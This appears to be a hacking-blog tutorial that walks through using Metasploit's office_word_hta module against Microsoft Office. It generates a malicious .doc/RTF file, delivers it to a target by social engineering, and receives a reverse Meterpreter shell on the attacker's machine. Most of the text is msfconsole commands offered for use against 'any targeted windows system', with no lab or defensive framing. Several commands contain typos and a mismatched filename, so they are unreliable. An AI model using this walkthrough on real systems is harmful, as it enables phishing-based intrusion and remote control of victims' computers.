For
Kali Linux users we had perform this attack through metasploit without using
any python script which generates .rtf file for attack, thus the user only need
to update their kali Linux and load metasploit framework to start this attack. This
is a zero –day exploit that has excellent rating against Ms-office
vulnerability which can be very easily used to shoot any targeted windows
system.
Attacker: Kali
Linux
Target: MS Office
Let’s breach!!
msfconsole
This
module creates a malicious RTF file that when opened in vulnerable versions of
Microsoft Word will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request, and execute hta code in
response. This bug was originally seen being exploited in the wild starting in
Oct 2016. This module was created by reversing a public malware sample.
Object Linking and Embedding Based on Component Object Model (COM) provides the
majority of compatibility
on Office, Working with default/third-party applications to provide rich
documentation features to Office users.
Use exploit/windows/fileformat/office_word_hta
Msf > exploit (office_word_hta)
>set srvhost 192.168.1.8
Msf > exploit (office_word_hta)
>set paylod windows/meterpreter/revrese_tcp
Msf > exploit (office_word_hta)
>set filename sale.doc
Msf > exploit (office_word_hta)
>set lhost 192.168.1.8
Msf > exploit (office_word_hta)
>exploit
This module will
automatically generate a malicious .rtf file inside /root/.msf4/local/sales.doc moreover it will generate a link and that link must be share to
target using social engineering method.
When
the user will open that link and make double
click (OLE event) on .hta file,
the attacker will received meterpreter sesssion in metasploit framewok.
Meterpreter > sysinfo
0 comments:
Post a Comment